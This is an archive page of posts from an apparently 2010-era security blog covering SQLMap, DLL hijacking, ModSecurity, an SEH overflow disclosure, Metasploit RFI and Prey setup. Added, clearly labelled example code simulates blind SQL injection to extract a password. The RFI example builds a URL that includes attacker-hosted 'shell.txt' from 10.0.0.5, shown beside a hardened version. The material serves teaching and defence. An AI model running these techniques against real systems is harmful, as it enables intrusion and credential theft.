
Posts by t0m

2 Sep

How to: SQLMap (dump and destroy)

SQLMap is the tool for automating SQL injection exploitation, and it is the most popular tool for that job. Most script kiddies know it only as a way to gather information and pull back table contents, so here I want to share what makes SQLMap powerful beyond being "a database dumper tool".

I will split this into three sections: SQLMap as a fingerprinter (we already know this one), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.
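To make the "fingerprinter" and "enumerator" phases concrete, here is an added example (not code from the original post and not SQLMap's own code) that simulates what SQLMap does in boolean-based blind mode. A tiny "application" is built on an in-memory SQLite database with constructed sample data and a string-concatenated query, which is the injectable pattern; the attacker side can only see whether a product row came back, and from that single bit per request it confirms the injection, extracts the backend version (fingerprinting) and walks the table list (enumeration) by binary-searching each character. The "destroyer" phase is not simulated here.

```python
import sqlite3

# Constructed sample data: two tables in an in-memory SQLite database.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT);
        CREATE TABLE users(id INTEGER, login TEXT, pw TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return db

DB = build_db()
PROBES = {"count": 0}          # how many requests the attacker needed

def vulnerable_page(product_id: str) -> bool:
    """Simulates /product?id=...: True when the page shows a product.
    The id is concatenated straight into the SQL, which is the bug."""
    PROBES["count"] += 1
    query = f"SELECT name FROM products WHERE id={product_id}"
    try:
        return DB.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False

def ask(condition: str) -> bool:
    """One boolean-blind probe: a true condition keeps the product row."""
    return vulnerable_page(f"1 AND ({condition})")

def fingerprint() -> bool:
    """Injection is confirmed when a true and a false tautology differ."""
    return ask("1=1") and not ask("1=2")

def extract_string(expr: str, max_len: int = 64) -> str:
    """Recover the value of a SQL expression one character at a time,
    binary-searching the code point of each position. A position past the
    end of the string yields code point 0, which ends the loop."""
    out = []
    for pos in range(1, max_len + 1):
        probe = (f"coalesce(unicode(substr(coalesce(({expr}),''),{pos},1)),0)")
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"{probe} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)

def version_matches() -> bool:
    """Fingerprint step: the extracted version equals the real one."""
    return extract_string("sqlite_version()") == sqlite3.sqlite_version

def enumerate_tables() -> list:
    """Enumeration step: walk sqlite_master one row at a time."""
    names, i = [], 0
    while True:
        name = extract_string(
            f"SELECT name FROM sqlite_master WHERE type='table' "
            f"LIMIT 1 OFFSET {i}")
        if not name:
            return names
        names.append(name)
        i += 1

if __name__ == "__main__":
    print("injectable:", fingerprint())
    print("version ok:", version_matches())
    print("tables:", enumerate_tables())
    print("admin pw:", extract_string("(SELECT pw FROM users WHERE login='admin')"))
    print("requests used:", PROBES["count"])
```

Watching the request counter is the point of running it: every character costs about seven requests, which is why SQLMap prefers error-based or UNION techniques when the target allows them and falls back to blind extraction only when it must.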

28 Aug

The Danger of DLL Exploitation

Exploitation of DLLs (Dynamic-Link Libraries) is on the verge of becoming a serious concern. Almost every application used day to day, whether for productivity or just for entertainment, is vulnerable to DLL Hijacking. The weakness was brought to attention by the ACROS Security team, who posted to Bugtraq that they could make iTunes load an additional (malicious) DLL that the program looks for. As a result, iTunes "carries" the malicious DLL along and the attacker can execute commands on the system.

This finding prompted security researchers around the world to hunt for other exploitable applications. Teams from Offensive Security and the Corelan Team compiled an (unofficial) list of applications/programs/software affected by DLL Hijacking. Automated exploitation frameworks such as Metasploit and the Social-Engineer Toolkit have even added modules to exploit this DLL weakness. Attacks based on it typically target the client side, commonly known as a client-side attack.

Microsoft responded quickly with guidance for handling the weakness; see the following Microsoft pages:

  1. Microsoft Security Advisory (2269637)
  2. A new CWDIllegalInDllSearch registry entry is available to control the DLL search path algorithm

Sources: Rapid7 Network Security Blog, Exploit Database, Microsoft
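The advisory and the CWDIllegalInDllSearch entry above are easier to reason about with the search order written down. The following is an added example, not code from the original post or from Microsoft: it models the default DLL search order (with SafeDllSearchMode on: application directory, system directories, current working directory, then PATH) over a constructed in-memory "filesystem", and applies the documented CWDIllegalInDllSearch values (0xFFFFFFFF removes the current directory entirely, 0x1 skips it when it is a remote location, 0x2 skips it when it is a WebDAV folder). The player application, the share and the plugin name are all made up for the illustration.

```python
# Default DLL search order with SafeDllSearchMode enabled: application
# directory, then the system directories, then the current working
# directory, then the directories on PATH.
SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]

def search_order(app_dir, cwd, cwd_kind, path_dirs, cwd_illegal=0):
    """Return the directories probed, in order. cwd_kind is 'local',
    'remote' (UNC share) or 'webdav'; cwd_illegal is the registry value."""
    skip_cwd = (cwd_illegal == 0xFFFFFFFF
                or (cwd_illegal == 0x1 and cwd_kind in ("remote", "webdav"))
                or (cwd_illegal == 0x2 and cwd_kind == "webdav"))
    order = [app_dir] + SYSTEM_DIRS
    if not skip_cwd:
        order.append(cwd)
    return order + list(path_dirs)

def resolve(dll, fs, order):
    """First directory in the search order that contains the DLL wins;
    None means the load fails (no DLL found at all)."""
    for d in order:
        candidate = d.rstrip("\\") + "\\" + dll
        if candidate.lower() in fs:
            return candidate
    return None

# Constructed filesystem: the app needs plugin.dll but does not ship it,
# and the victim opened a media file from an attacker-controlled share,
# so the share is the current working directory.
FS = {p.lower() for p in [
    r"C:\Program Files\Player\player.exe",
    r"C:\Windows\System32\kernel32.dll",
    r"\\evil-share\music\track.mp3",
    r"\\evil-share\music\plugin.dll",      # planted by the attacker
]}
APP_DIR = r"C:\Program Files\Player"
SHARE = r"\\evil-share\music"
PATH_DIRS = [r"C:\Windows\System32", r"C:\Tools"]

def load(dll, cwd_illegal=0, cwd_kind="remote"):
    """Resolve a DLL for the constructed scenario under a given setting."""
    order = search_order(APP_DIR, SHARE, cwd_kind, PATH_DIRS, cwd_illegal)
    return resolve(dll, FS, order)

if __name__ == "__main__":
    print("default      :", load("plugin.dll"))
    print("0xFFFFFFFF   :", load("plugin.dll", 0xFFFFFFFF))
    print("0x1, remote  :", load("plugin.dll", 0x1))
    print("0x1, local   :", load("plugin.dll", 0x1, "local"))
    print("kernel32.dll :", load("kernel32.dll"))
```

Two things the model makes visible: a DLL that already lives in System32 cannot be hijacked this way because the system directories are searched before the current directory, so the exposed DLLs are the ones an application asks for but does not ship; and the 0x1 setting only helps when the working directory is remote, while 0xFFFFFFFF closes the hole for local folders too, at the cost of applications that genuinely rely on loading from the current directory.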

13 Aug

OWASP ModSecurity Core Rule Set

ModSecurity is a good starting point for securing your web site. OWASP provides the Core Rule Set (CRS), a set of ModSecurity rules against the most critical web application attacks.

From OWASP:

ModSecurity is an Apache web server module that provides a web application firewall engine. The ModSecurity Rules Language engine is extremely flexible and robust and has been referred to as the “Swiss Army Knife of web application firewalls.”

In order to enable users to take full advantage of ModSecurity out of the box, we have developed the Core Rule Set (CRS) which provides critical protections against attacks across most every web architecture.

Check the OWASP Core Rule Set home page for more info.

Download here

6 Aug

Backtrack 4 R1 is released to Public

Backtrack 4 R1 is now released to the public.
Find out here.

*This version seems larger than the previous one.

10 Jul

Batch Audio Converter <=v.1.0.0 Stack Overflow (SEH)

While idly looking for an application to tinker with for SEH practice, I came across Batch Audio Converter <= v.0.4.0.0 and successfully exploited it through an SEH overflow (clear write-ups on SEH can be found on Peter Van Eeckhoutte's site and on Indonesia's oldest underground site, Kecoak Elektronik). To check the application's version I looked at Help/About in the application and visited the maker's site. The maker is Freewaretoolbox, so I downloaded the latest version, 1.0.0, and it turned out to be still affected by the buffer overflow.

I immediately emailed the maker asking for a prompt fix, because this application appears to be in common use: many internet users regularly convert from mp3 to wav or to other formats.

27 May

Nessus access from Android 2.2

Now that Android 2.2 (code name Froyo, frozen yogurt, released last week at Google I/O, May 19-20, 2010) supports Flash, we can reach a remote Nessus server (whose web interface has used Flash since version 4.2) from a mobile device.

Nessus on Android 2.2

This also makes mobile pentesting more powerful. TheAluc is researching on his Twitter how to make Android mobile hacking possible. In the near future pentesters won't bring a laptop to the café or office; they will just bring an Android phone :D

*TheAluc also pulled off the "impossible" Ruby/Metasploit port on Android (Nexus One).

Metasploit on Android

A project tracked on Metasploit's Redmine is also working on jRuby to make the Metasploit port more stable.

24 May

Metasploit 3.4.0 Released

Metasploit 3.4.0 has been released to the public. Check the Release Notes or go directly to the Download.

21 May

PHP include exploitation with Metasploit

Metasploit supports PHP include exploitation, better known as RFI (Remote File Inclusion). I will show how this works on CS-Cart 1.3.3, which is vulnerable to remote file inclusion.

The vulnerable path is at classes/phpmailer/class.cs_phpmailer.php?classes_dir=[include arbitrary php code]

so in Metasploit, the PHPURI path will look like this:

classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX

Let's see how this exploitation works.
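As an added example (not code from the original post, from Metasploit or from CS-Cart), the following shows what the XXpathXX placeholder turns into and why a URL in that parameter ends up executing. The vulnerable include is reconstructed as the generic shape of the bug, a request-controlled prefix handed to include() with a fixed file name appended, rather than CS-Cart's actual source; the attacker host 10.0.0.5 and the allow_url_include flag are assumptions. A hardened version of the same include is shown beside it.

```python
import posixpath
import re

# The Metasploit php_include convention: XXpathXX marks where the module
# substitutes the location of the PHP it hosts for the target to fetch.
PHPURI = "classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX"

def build_exploit_uri(phpuri=PHPURI, payload_url="http://10.0.0.5:8080/shell.txt?"):
    """Replace the placeholder with the attacker-hosted PHP location
    (assumed listener address). The trailing '?' turns whatever the
    application appends into a query string instead of a path."""
    return phpuri.replace("XXpathXX", payload_url)

ALLOW_URL_INCLUDE = True   # php.ini setting that RFI depends on (assumed On)

def vulnerable_include(classes_dir):
    """Reconstructed shape of the bug: the request supplies the directory
    prefix and the application appends a fixed file name before include().
    Returns what PHP would try to include and from where."""
    target = classes_dir + "/class.phpmailer.php"
    if re.match(r"^[a-z]+://", target):
        if not ALLOW_URL_INCLUDE:
            raise PermissionError("allow_url_include is Off: remote include refused")
        return ("remote", target)
    return ("local", target)

BASE = "/var/www/cs-cart/classes"   # assumed install location

def hardened_include(classes_dir, base=BASE):
    """Same include with two checks: the directory must be a plain name
    (no scheme, no slashes, no traversal) and the resolved path must stay
    under the application's own classes directory."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", classes_dir):
        raise ValueError("classes_dir must be a plain directory name")
    full = posixpath.normpath(posixpath.join(base, classes_dir, "class.phpmailer.php"))
    if not full.startswith(base + "/"):
        raise ValueError("resolved path escapes the classes directory")
    return ("local", full)

def is_rejected(classes_dir) -> bool:
    """True when the hardened include refuses the value."""
    try:
        hardened_include(classes_dir)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(build_exploit_uri())
    print(vulnerable_include("http://10.0.0.5:8080/shell.txt?"))
    print(vulnerable_include("phpmailer"))
    print(hardened_include("phpmailer"))
    for bad in ("http://10.0.0.5:8080/shell.txt?", "../../../etc", "phpmailer/.."):
        print(bad, "rejected:", is_rejected(bad))
```

Two conditions have to hold on the target for the remote case to work: allow_url_include must be On (the flag modelled above) and the appended file name must not break the URL, which is what the trailing '?' in the payload URL takes care of. Either of the two checks in the hardened version alone already kills the remote case; the path confinement is kept as well so that a plain-name bypass cannot become a local file inclusion.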

17 May

Setting Up Prey on Back|Track 4

Did you know that Back|Track 4 includes Prey in its installation?
If you didn't, let's set up this device-tracking application.

First, check whether the Prey installation exists. Look in /usr/share/prey; if it is there, you can go ahead and configure the application.

Create an account on your Prey Control Panel at Preyproject <http://preyproject.com>. Once it is created, add your device and note your API key and Device key (both are shown in the Control Panel and on the Profile page).

Edit /usr/share/prey/config and add your API Key and Device Key. Set up email notification as you need it and Prey is ready to go.

Run Prey to make sure it syncs all its info to the Prey website.

root@bt:~# /usr/share/prey/prey.sh

 ### PREY 0.3.73 spreads its wings!
 ### Linux bt 2.6.30.9 #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux

 – Looking for connection…
 – Got network connection!
 – Checking URL…
 – Got XML. Parsing…

 >> Reading configuration…

 – Delay in sync.

 >> Verifying status…

 – Got status code 200!
 – Nothing to worry about. :)

root@bt:~# 

If the result matches the above, you're good. Back|Track 4 already schedules Prey to sync every 20 minutes.
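The steps above can be scripted. The following is an added example, not part of the original post and not Prey's own code: it checks that the Back|Track install is where the post says it is, writes the API key and Device key into the config, and tightens the file's permissions, since those keys are what lets the Prey panel identify and command the device. It assumes the Prey 0.3 config holds the keys as shell-style lines `api_key='...'` and `device_key='...'` (prey.sh sources the file); the constructed SAMPLE_CONFIG used by the demo only follows that assumed layout, and the key values in it are made up.

```python
import os
import re
import stat
import tempfile

PREY_ROOT = "/usr/share/prey"   # location named in the post

def prey_installed(root=PREY_ROOT) -> bool:
    """Both the launcher and the config must be present to proceed."""
    return (os.path.isfile(os.path.join(root, "prey.sh"))
            and os.path.isfile(os.path.join(root, "config")))

# Constructed stand-in for the relevant lines of the Prey 0.3 config
# (assumed layout: shell variables sourced by prey.sh).
SAMPLE_CONFIG = """# Prey configuration
api_key=''
device_key=''
mail_to='you@example.com'
"""

def set_key(text: str, name: str, value: str) -> str:
    """Replace the value of one variable line. The value is restricted to
    alphanumerics so nothing can close the quote and inject shell into a
    file that prey.sh later sources."""
    if not re.fullmatch(r"[A-Za-z0-9]+", value):
        raise ValueError(f"{name}: key contains unexpected characters")
    pattern = re.compile(rf"^{name}=.*$", re.M)
    if not pattern.search(text):
        raise KeyError(f"{name} not found in config")
    return pattern.sub(f"{name}='{value}'", text, count=1)

def is_bad_key(value: str) -> bool:
    """True when set_key refuses the value."""
    try:
        set_key(SAMPLE_CONFIG, "api_key", value)
    except ValueError:
        return True
    return False

def configure(config_path: str, api_key: str, device_key: str) -> str:
    """Write both keys into the config and make it owner-readable only."""
    with open(config_path) as f:
        text = f.read()
    text = set_key(text, "api_key", api_key)
    text = set_key(text, "device_key", device_key)
    with open(config_path, "w") as f:
        f.write(text)
    os.chmod(config_path, stat.S_IRUSR | stat.S_IWUSR)   # 0600: keys are secrets
    return text

def demo() -> str:
    """Run configure() against a temporary copy of the sample config
    with made-up keys, so the example works without a Prey install."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, "config")
    with open(path, "w") as f:
        f.write(SAMPLE_CONFIG)
    return configure(path, "0123abcd4567ef89", "abc123")

if __name__ == "__main__":
    if prey_installed():
        print("Prey found at", PREY_ROOT, "- edit keys with configure()")
    else:
        print("Prey not found at", PREY_ROOT, "- running on a temporary copy")
    print(demo())
```

After writing the keys, run /usr/share/prey/prey.sh as in the transcript above and look for the "Got status code 200!" line; that is the confirmation that the panel accepted the pair.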

2 May

Penetration testing Real world mode by Offsec

A video about penetration testing in the real world; enjoy it, from Offensive Security.
It cannot be embedded, so it is better viewed on their website.

The video is here:

http://www.offensive-security.com/videos/penetration-testing-in-the-real-world/

Enjoy!
